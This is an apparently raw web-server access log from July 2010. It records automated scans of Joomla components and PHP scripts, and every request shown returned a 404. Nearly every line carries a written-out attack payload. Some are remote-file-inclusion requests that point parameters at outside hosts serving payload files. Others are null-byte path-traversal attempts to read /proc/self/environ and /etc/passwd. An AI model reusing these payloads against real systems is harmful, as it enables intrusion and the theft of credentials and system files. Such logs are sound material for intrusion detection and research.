80.249.165.44 - - [27/Jul/2010:08:41:36 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 312 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:41:36 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:18 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:18 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:18 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:41 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 312 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:41 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:45:41 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
95.211.71.21 - - [27/Jul/2010:08:51:12 +0200] "GET //admin/business_inc/saveserver.php?thisdir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 321 "-" "Mozilla/5.0"
95.211.71.21 - - [27/Jul/2010:08:51:12 +0200] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://tubiwityu.fileave.com/kill9/id1.txt??? HTTP/1.1" 404 326 "-" "Mozilla/5.0"
95.211.71.21 - - [27/Jul/2010:08:51:24 +0200] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 326 "-" "plaNETWORK Bot Search"
95.211.71.21 - - [27/Jul/2010:08:51:24 +0200] "GET //admin/business_inc/saveserver.php?thisdir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 321 "-" "plaNETWORK Bot Search"
67.227.197.25 - - [27/Jul/2010:08:58:12 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:08:58:12 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
80.249.165.44 - - [27/Jul/2010:09:07:43 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:07:43 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:07:43 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 312 "-" "plaNETWORK Bot Search"
114.108.151.149 - - [27/Jul/2010:09:08:51 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:09:08:58 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:09:10:09 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:10:30 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:13:07 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:14:50 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
80.249.165.44 - - [27/Jul/2010:09:15:13 +0200] "GET /index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:15:13 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:15:13 +0200] "GET /logs/access_log%20%20/index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 314 "-" "plaNETWORK Bot Search"
87.118.67.13 - - [27/Jul/2010:09:24:15 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
114.108.151.149 - - [27/Jul/2010:09:24:26 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:09:28:46 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:09:28:47 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:09:28:47 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:09:30:23 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:30:24 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:30:24 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:09:32:17 +0200] "GET /logs/access_log/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:32:17 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:32:17 +0200] "GET /logs/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:12 +0200] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:13 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:34:06 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
114.108.151.149 - - [27/Jul/2010:09:35:26 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:35:26 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:35:27 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:09:41:23 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:41:32 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.249.165.44 - - [27/Jul/2010:09:44:01 +0200] "GET /logs/index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 301 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:44:01 +0200] "GET /logs/access_log/index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 312 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:44:01 +0200] "GET /index.php?option=com_ccnewsletter&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 296 "-" "plaNETWORK Bot Search"
114.108.151.149 - - [27/Jul/2010:09:45:13 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:45:13 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:45:14 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:09:52:14 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:52:14 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:52:14 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
94.23.215.207 - - [27/Jul/2010:09:52:33 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:33 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:34 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:09:56:04 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:56:05 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:56:05 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:09:57:16 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:57:16 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:57:16 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
216.18.201.205 - - [27/Jul/2010:09:59:40 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
213.145.228.170 - - [27/Jul/2010:10:01:32 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:38 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:38 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:10:05:38 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.813"
216.18.201.205 - - [27/Jul/2010:10:05:59 +0200] "GET /logs/access_log//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:06:00 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
216.18.201.205 - - [27/Jul/2010:10:06:00 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.833"
98.130.2.13 - - [27/Jul/2010:10:14:39 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:15:32 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:29 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:29 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:18:30 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
202.47.80.12 - - [27/Jul/2010:10:21:55 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
202.47.80.12 - - [27/Jul/2010:10:21:55 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
67.227.197.25 - - [27/Jul/2010:10:24:41 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:24:41 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:24:50 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:24:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:24:50 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:10:24:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
92.43.201.28 - - [27/Jul/2010:10:25:51 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:25:51 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:26:13 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:10:26:17 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
98.130.2.13 - - [27/Jul/2010:10:28:11 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
76.242.100.234 - - [27/Jul/2010:10:31:58 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:31:58 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:32:13 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:32:13 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:33:56 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:33:56 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
98.130.2.13 - - [27/Jul/2010:10:34:24 +0200] "GET /logs/access_log//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:34:24 +0200] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
98.130.2.13 - - [27/Jul/2010:10:34:24 +0200] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
76.242.100.234 - - [27/Jul/2010:10:36:21 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:10:36:21 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
114.108.151.149 - - [27/Jul/2010:10:37:23 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:10:37:24 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:10:37:24 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.805"
98.130.2.13 - - [27/Jul/2010:10:46:55 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
